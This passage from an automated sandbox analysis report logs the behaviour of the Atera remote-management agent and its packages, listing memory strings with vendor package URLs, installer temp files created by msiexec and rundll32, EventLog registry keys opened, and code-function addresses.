                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric/MacAgent/1.0/AteraAgentInstaller.pkgA/
                                Source: AgentPackageUpgradeAgent.exe, 0000002F.00000000.1946868282.0000010B6E4B2000.00000002.00000001.01000000.00000029.sdmpString found in binary or memory: https://packagesstore.blob.core.windows.net/installers/Fabric5Get
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822AF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ate
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234005EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateH
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A8821DF000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHjO
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A882204000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHx
                                Source: AteraAgent.exe, 0000001A.00000002.2152969045.000001A8822B6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.ateHz
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001D3000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234000EC000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 0000001A.00000002.2152969045.000001A881A65000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/a
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/ag
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAg
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAge
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageAgentInformation/1.13/AgentPackageAgentI
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400239000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageMonitoring/0.40/AgentPackageMonitoring.z
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003F5000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400442000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagescrossplatform/AgentPackageSTRemote/2.3/AgentPackageSTRemote.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Availability/0.16/Agent.Package.Availability.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.0000023400141000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.IotPoc/0.2/Agent.Package.IotPoc.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/Agent.Package.Watchdog/1.5/Agent.Package.Watchdog.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageADRemote/6.0/AgentPackageADRemote.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234003E4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageAgentInformation/37.9/AgentPackageAgentInformation
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageHeartbeat/17.11/AgentPackageHeartbeat.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageInternalPoller/13.0/AgentPackageInternalPoller.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMarketplace/1.6/AgentPackageMarketplace.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/36.9/AgentPackageMonitoring.zip
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.0000023400544000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageMonitoring/36.9/AgentPackageMonitoring.ziph
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234001B7000.00000004.00000800.00020000.00000000.sdmp, AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageNetworkDiscovery/13.0/AgentPackageNetworkDiscovery
                                Source: AteraAgent.exe, 00000010.00000002.1903414217.00000234006FA000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://ps.atera.com/agentpackagesmac/AgentPackageOsUpdates/19.9/AgentPackageOsUpdates.zip
                                Source: AgentPackageMonitoring.exeString found in binary or memory: https://www.sqlite.org/copyright.html
                                Source: AgentPackageMonitoring.exe, 00000025.00000002.1841793357.00007FFB03054000.00000002.00000001.01000000.0000001E.sdmpString found in binary or memory: https://www.sqlite.org/copyright.html2
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\System32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB

                                Spam, unwanted Advertisements and Ransom Demands

                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\AlphaAgent
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\AlphaAgent
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c998e.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI9B15.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIA259.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB4E8.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{E732A0D7-A2F2-4657-AC41-B19742648E45}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBB81.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBB92.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBC4E.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBEDF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c9990.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSID8C1.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c9991.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIB586.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIBD86.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSICBCF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDBBE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDBCF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDDD3.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIDF2C.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{6B2921FF-79C1-4EBF-81B4-C606D4E5BEF4}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1C9.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI1CA.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI3FD.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI48B.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c999d.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSIAC5.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c999e.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI28DE.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{3FDCF0A2-7C1F-41C7-9749-0D91EC216AED}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI2B50.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c99a1.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI64A0.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c99a2.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI66C4.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{667CB653-70E1-4E2B-9C8E-6A02A6CF88B9}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6762.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c99a5.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6A60.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c99a6.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6E49.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\SourceHash{A09F8381-88C3-44C4-9DAB-AC44F4F4DB4B}
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI6F54.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\4c99a9.msi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7187.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI72FF.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\inprogressinstallinfo.ipi
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7439.tmp
                                Source: C:\Windows\System32\msiexec.exe File created: C:\Windows\Installer\MSI7A93.tmp
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSI9B15.tmp-\CustomAction.config
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIA259.tmp-\CustomAction.config
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSIB4E8.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\InstallUtil.InstallLog
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\698460A0B6E60F2F602361424D832905_8BB23D43DE574E82F2BEE0DF0EC47EEB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8EC9B1D0ABBD7F98B401D425828828CE_DEB07B5578A606ED6489DDA2E357A944
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\BA74182F76F15A9CF514DEF352303C95
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C56C4404C4DEF0DC88E5FCD9F09CB2F1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2E248BEDDBB2D85122423C41028BFD4
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-\AlphaControlAgentInstallation.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-\Microsoft.Deployment.WindowsInstaller.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-\Newtonsoft.Json.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-\System.Management.dll
                                Source: C:\Windows\SysWOW64\rundll32.exe File created: C:\Windows\Installer\MSID8C1.tmp-\CustomAction.config
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageAgentInformation.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageSTRemote.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMonitoring.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageUpgradeAgent.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageProgramManagement.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageInternalPoller\AgentPackageInternalPoller.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageInternalPoller.exe.log
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMarketplace\AgentPackageMarketplace.exe File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\AgentPackageMarketplace.exe.log
                                Source: C:\Windows\System32\msiexec.exe File deleted: C:\Windows\Installer\MSI9B15.tmp
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB573CD026_2_00007FFAAB573CD0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56CD8026_2_00007FFAAB56CD80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB561D8A26_2_00007FFAAB561D8A
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56943626_2_00007FFAAB569436
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB56CE3026_2_00007FFAAB56CE30
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7792D026_2_00007FFAAB7792D0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77126E26_2_00007FFAAB77126E
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77D15126_2_00007FFAAB77D151
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7600BF26_2_00007FFAAB7600BF
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77884D26_2_00007FFAAB77884D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77B71926_2_00007FFAAB77B719
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB769E9D26_2_00007FFAAB769E9D
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB76943526_2_00007FFAAB769435
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB7799D126_2_00007FFAAB7799D1
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB76695026_2_00007FFAAB766950
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exeCode function: 26_2_00007FFAAB77871826_2_00007FFAAB778718
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59895629_2_00007FFAAB598956
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5912FB29_2_00007FFAAB5912FB
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59970229_2_00007FFAAB599702
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5B66B029_2_00007FFAAB5B66B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5A5B3129_2_00007FFAAB5A5B31
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB5AD35029_2_00007FFAAB5AD350
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exeCode function: 29_2_00007FFAAB59073029_2_00007FFAAB590730
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59847632_2_00007FFAAB598476
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5952FA32_2_00007FFAAB5952FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A19B032_2_00007FFAAB5A19B0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB596F5932_2_00007FFAAB596F59
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5815FA32_2_00007FFAAB5815FA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5915FD32_2_00007FFAAB5915FD
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59F1D332_2_00007FFAAB59F1D3
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1AAA32_2_00007FFAAB5A1AAA
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1A8032_2_00007FFAAB5A1A80
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB5A1A7832_2_00007FFAAB5A1A78
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB59F12032_2_00007FFAAB59F120
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exeCode function: 32_2_00007FFAAB58083832_2_00007FFAAB580838
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FF01E037_2_00007FFB02FF01E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE20E037_2_00007FFB02FE20E0
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02FE696037_2_00007FFB02FE6960
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02F3B88037_2_00007FFB02F3B880
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED033037_2_00007FFB02ED0330
                                Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exeCode function: 37_2_00007FFB02ED231037_2_00007FFB02ED2310
